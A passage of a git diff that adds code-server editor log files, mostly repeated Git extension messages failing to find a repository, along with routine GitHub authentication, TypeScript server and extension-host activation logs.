a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 23:27:06.741 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 23:27:06.741 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 23:27:08.557 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 23:27:08.557 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 23:27:25.141 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 23:27:25.141 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 23:27:38.193 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 23:27:38.193 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 23:27:46.944 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 23:27:46.945 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 23:32:09.681 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 23:32:09.681 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 23:33:11.282 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 23:33:11.282 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 23:34:10.635 [info] > git rev-parse --show-toplevel [4ms] +2026-01-29 23:34:10.635 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 23:39:32.362 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 23:39:32.362 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 23:40:52.589 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 23:40:52.589 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 23:41:24.433 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 23:41:24.433 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 23:41:30.204 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 23:41:30.204 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 23:41:31.849 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 23:41:31.849 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 23:41:37.117 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 23:41:37.117 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 23:41:56.775 [info] > git rev-parse --show-toplevel [5ms] +2026-01-29 23:41:56.775 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 23:45:28.189 [info] > git rev-parse --show-toplevel [3ms] +2026-01-29 23:45:28.189 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 23:45:39.548 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 23:45:39.548 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 23:46:42.739 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 23:46:42.739 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 23:46:50.413 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 23:46:50.413 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 23:46:51.379 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 23:46:51.379 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 23:46:52.494 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 23:46:52.494 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 23:47:01.251 [info] > git rev-parse --show-toplevel [6ms] +2026-01-29 23:47:01.251 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 23:48:30.670 [info] > git rev-parse --show-toplevel [3ms] +2026-01-29 23:48:30.670 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 23:48:42.725 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 23:48:42.725 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 23:48:43.273 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 23:48:43.273 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 23:48:43.932 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 23:48:43.932 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 00:01:59.391 [info] > git rev-parse --show-toplevel [6ms] +2026-01-30 00:01:59.391 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 00:07:56.595 [info] > git rev-parse --show-toplevel [3ms] +2026-01-30 00:07:56.595 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 00:07:57.043 [info] > git rev-parse --show-toplevel [3ms] +2026-01-30 00:07:57.043 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 00:07:59.467 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 00:07:59.467 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 00:08:14.362 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 00:08:14.362 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 00:08:24.529 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 00:08:24.529 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 00:08:25.186 [info] > git rev-parse --show-toplevel [2ms] +2026-01-30 00:08:25.186 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 00:08:25.894 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 00:08:25.894 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 00:09:02.122 [info] > git rev-parse --show-toplevel [3ms] +2026-01-30 00:09:02.122 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 00:12:49.400 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 00:12:49.400 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 00:24:07.679 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 00:24:07.679 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 00:25:14.895 [info] > git rev-parse --show-toplevel [2ms] +2026-01-30 00:25:14.895 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 00:30:46.539 [info] > git rev-parse --show-toplevel [3ms] +2026-01-30 00:30:46.539 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 00:34:11.418 [info] > git rev-parse --show-toplevel [2ms] +2026-01-30 00:34:11.418 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 00:39:29.403 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 00:39:29.404 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 00:40:04.108 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 00:40:04.108 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 00:41:34.606 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 00:41:34.606 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 00:41:38.367 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 00:41:38.367 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 00:54:35.492 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 00:54:35.492 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 00:56:06.846 [info] > git rev-parse --show-toplevel [3ms] +2026-01-30 00:56:06.847 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 01:05:34.237 [info] > git rev-parse --show-toplevel [2ms] +2026-01-30 01:05:34.237 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 01:06:00.663 [info] > git rev-parse --show-toplevel [2ms] +2026-01-30 01:06:00.663 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 01:06:02.782 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 01:06:02.782 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 01:17:03.860 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 01:17:03.860 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 01:35:54.863 [info] > git rev-parse --show-toplevel [2ms] +2026-01-30 01:35:54.864 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 01:36:59.682 [info] > git rev-parse --show-toplevel [2ms] +2026-01-30 01:36:59.682 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 01:37:56.378 [info] > git rev-parse --show-toplevel [4ms] +2026-01-30 01:37:56.378 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 01:38:40.371 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 01:38:40.371 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 01:40:27.322 [info] > git rev-parse --show-toplevel [2ms] +2026-01-30 01:40:27.322 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 01:40:27.837 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 01:40:27.837 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 01:40:28.600 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 01:40:28.600 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 01:46:20.218 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 01:46:20.218 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 01:47:55.798 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 01:47:55.798 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 01:49:44.114 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 01:49:44.114 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 01:50:59.661 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 01:50:59.661 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 01:51:10.285 [info] > git rev-parse --show-toplevel [4ms] +2026-01-30 01:51:10.285 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 01:51:10.818 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 01:51:10.818 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 01:51:11.530 [info] > git rev-parse --show-toplevel [2ms] +2026-01-30 01:51:11.530 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 01:51:12.369 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 01:51:12.370 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 01:51:13.742 [info] > git rev-parse --show-toplevel [2ms] +2026-01-30 01:51:13.742 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 01:55:24.466 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 01:55:24.466 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 01:56:41.423 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 01:56:41.424 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 01:56:41.974 [info] > git rev-parse --show-toplevel [2ms] +2026-01-30 01:56:41.974 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 01:57:07.694 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 01:57:07.694 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 01:59:40.610 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 01:59:40.610 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 01:59:41.172 [info] > git rev-parse --show-toplevel [2ms] +2026-01-30 01:59:41.172 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 01:59:42.200 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 01:59:42.200 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 01:59:44.700 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 01:59:44.700 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). diff --git a/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost1/vscode.github-authentication/GitHub Authentication.log b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost1/vscode.github-authentication/GitHub Authentication.log new file mode 100755 index 0000000..0e1b382 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost1/vscode.github-authentication/GitHub Authentication.log @@ -0,0 +1,33 @@ +2026-01-29 21:56:10.859 [info] Reading sessions from keychain... +2026-01-29 21:56:10.859 [info] Getting sessions for all scopes... +2026-01-29 21:56:10.859 [info] Got 0 sessions for ... +2026-01-29 21:56:10.859 [info] Getting sessions for all scopes... +2026-01-29 21:56:10.859 [info] Got 0 sessions for ... +2026-01-29 21:56:10.859 [info] Getting sessions for all scopes... +2026-01-29 21:56:10.859 [info] Got 0 sessions for ... +2026-01-29 21:56:10.859 [info] Getting sessions for all scopes... +2026-01-29 21:56:10.859 [info] Got 0 sessions for ... +2026-01-29 21:56:10.859 [info] Getting sessions for all scopes... +2026-01-29 21:56:10.859 [info] Got 0 sessions for ... +2026-01-29 21:56:10.859 [info] Getting sessions for all scopes... +2026-01-29 21:56:10.859 [info] Got 0 sessions for ... +2026-01-29 21:56:10.859 [info] Getting sessions for all scopes... +2026-01-29 21:56:10.859 [info] Got 0 sessions for ... +2026-01-29 21:56:10.859 [info] Getting sessions for all scopes... +2026-01-29 21:56:10.859 [info] Got 0 sessions for ... +2026-01-29 21:56:10.859 [info] Getting sessions for all scopes... +2026-01-29 21:56:10.859 [info] Got 0 sessions for ... +2026-01-29 21:56:10.859 [info] Getting sessions for all scopes... +2026-01-29 21:56:10.859 [info] Got 0 sessions for ... +2026-01-29 21:56:10.859 [info] Getting sessions for all scopes... +2026-01-29 21:56:10.859 [info] Got 0 sessions for ... +2026-01-29 21:56:10.859 [info] Getting sessions for all scopes... +2026-01-29 21:56:10.859 [info] Got 0 sessions for ... +2026-01-29 21:56:10.859 [info] Getting sessions for all scopes... +2026-01-29 21:56:10.859 [info] Got 0 sessions for ... +2026-01-29 21:56:10.859 [info] Getting sessions for all scopes... +2026-01-29 21:56:10.859 [info] Got 0 sessions for ... +2026-01-29 21:56:10.859 [info] Getting sessions for all scopes... +2026-01-29 21:56:10.859 [info] Got 0 sessions for ... +2026-01-29 21:56:11.960 [info] Getting sessions for all scopes... +2026-01-29 21:56:11.960 [info] Got 0 sessions for ... diff --git a/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost1/vscode.github/GitHub.log b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost1/vscode.github/GitHub.log new file mode 100755 index 0000000..2762944 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost1/vscode.github/GitHub.log @@ -0,0 +1 @@ +2026-01-29 21:56:10.989 [info] Log level: Info diff --git a/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost1/vscode.html-language-features/HTML Language Server.log b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost1/vscode.html-language-features/HTML Language Server.log new file mode 100755 index 0000000..e69de29 diff --git a/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost1/vscode.typescript-language-features/TypeScript.log b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost1/vscode.typescript-language-features/TypeScript.log new file mode 100755 index 0000000..43a01c4 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost1/vscode.typescript-language-features/TypeScript.log @@ -0,0 +1,7 @@ +2026-01-29 22:07:52.158 [info] Starting TS Server +2026-01-29 22:07:52.158 [info] Using tsserver from: /usr/lib/code-server/lib/vscode/extensions/node_modules/typescript/lib/tsserver.js +2026-01-29 22:07:52.158 [info] Forking... +2026-01-29 22:07:52.158 [info] Starting... +2026-01-29 22:07:52.158 [info] Forking... +2026-01-29 22:07:52.158 [info] Starting... +2026-01-30 05:08:43.446 [error] TSServer exited. Code: null. Signal: SIGTERM diff --git a/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost2/remoteExtHostTelemetry.log b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost2/remoteExtHostTelemetry.log new file mode 100755 index 0000000..e69de29 diff --git a/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost2/remoteexthost.log b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost2/remoteexthost.log new file mode 100755 index 0000000..f6d83f0 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost2/remoteexthost.log @@ -0,0 +1,17 @@ +2026-01-30 17:35:16.305 [info] Extension host with pid 77728 started +2026-01-30 17:35:16.312 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/70d739db/vscode.lock': Lock acquired. +2026-01-30 17:35:16.461 [info] ExtensionService#_doActivateExtension vscode.github-authentication, startup: false, activationEvent: 'onAuthenticationRequest:github' +2026-01-30 17:35:16.462 [info] ExtensionService#_doActivateExtension vscode.emmet, startup: false, activationEvent: 'onLanguage' +2026-01-30 17:35:16.581 [info] ExtensionService#_doActivateExtension vscode.git-base, startup: true, activationEvent: '*', root cause: vscode.git +2026-01-30 17:35:16.633 [info] ExtensionService#_doActivateExtension vscode.git, startup: true, activationEvent: '*' +2026-01-30 17:35:16.634 [info] ExtensionService#_doActivateExtension vscode.github, startup: true, activationEvent: '*' +2026-01-30 17:35:16.795 [info] Eager extensions activated +2026-01-30 17:35:16.795 [info] ExtensionService#_doActivateExtension vscode.debug-auto-launch, startup: false, activationEvent: 'onStartupFinished' +2026-01-30 17:35:16.795 [info] ExtensionService#_doActivateExtension vscode.merge-conflict, startup: false, activationEvent: 'onStartupFinished' +2026-01-30 17:35:20.951 [info] ExtensionService#_doActivateExtension vscode.terminal-suggest, startup: false, activationEvent: 'onTerminalShellIntegration:*' +2026-01-30 17:36:46.782 [info] ExtensionService#_doActivateExtension vscode.extension-editing, startup: false, activationEvent: 'onLanguage:markdown' +2026-01-30 17:36:46.783 [info] ExtensionService#_doActivateExtension vscode.markdown-language-features, startup: false, activationEvent: 'onLanguage:markdown' +2026-01-30 17:36:47.388 [info] ExtensionService#_doActivateExtension vscode.markdown-math, startup: false, activationEvent: 'api', root cause: vscode.markdown-language-features +2026-01-31 01:39:06.483 [info] Extension host terminating: received terminate message from renderer +2026-01-31 01:39:06.484 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/70d739db/vscode.lock': Marking the lockfile as scheduled to be released in 6000 ms. +2026-01-31 01:39:06.540 [info] Extension host with pid 77728 exiting with code 0 diff --git a/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost2/vscode.git/Git.log b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost2/vscode.git/Git.log new file mode 100755 index 0000000..03c1645 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost2/vscode.git/Git.log @@ -0,0 +1,338 @@ +2026-01-30 17:35:16.883 [info] [main] Log level: Info +2026-01-30 17:35:16.883 [info] [main] Validating found git in: "git" +2026-01-30 17:35:16.883 [info] [main] Using git "2.39.5" from "git" +2026-01-30 17:35:16.883 [info] [Model][doInitialScan] Initial repository scan started +2026-01-30 17:35:16.883 [info] > git rev-parse --show-toplevel [5ms] +2026-01-30 17:35:16.883 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 17:35:16.883 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 17:35:16.883 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 17:35:16.883 [info] > git rev-parse --show-toplevel [2ms] +2026-01-30 17:35:16.883 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 17:35:16.883 [info] > git rev-parse --show-toplevel [2ms] +2026-01-30 17:35:16.883 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 17:35:16.883 [info] > git rev-parse --show-toplevel [28ms] +2026-01-30 17:35:16.883 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 17:35:16.894 [info] > git rev-parse --show-toplevel [8ms] +2026-01-30 17:35:16.894 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 17:35:16.899 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 17:35:16.899 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 17:35:16.906 [info] > git rev-parse --show-toplevel [2ms] +2026-01-30 17:35:16.906 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 17:35:16.911 [info] > git rev-parse --show-toplevel [2ms] +2026-01-30 17:35:16.911 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 17:35:16.916 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 17:35:16.916 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 17:35:16.920 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 17:35:16.920 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 17:35:16.928 [info] > git rev-parse --show-toplevel [5ms] +2026-01-30 17:35:16.928 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 17:35:16.932 [info] > git rev-parse --show-toplevel [2ms] +2026-01-30 17:35:16.932 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 17:35:16.936 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 17:35:16.936 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 17:35:16.943 [info] > git rev-parse --show-toplevel [4ms] +2026-01-30 17:35:16.943 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 17:35:16.946 [info] [Model][doInitialScan] Initial repository scan completed - repositories (0), closed repositories (0), parent repositories (0), unsafe repositories (0) +2026-01-30 17:35:18.430 [info] > git rev-parse --show-toplevel [6ms] +2026-01-30 17:35:18.430 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 17:35:20.647 [info] > git rev-parse --show-toplevel [1ms] +2026-01-30 17:35:20.647 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-30 17:35:21.059 [info] > git rev-parse --show-toplevel [2ms] +2026-01-30 17:35:21.059 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem 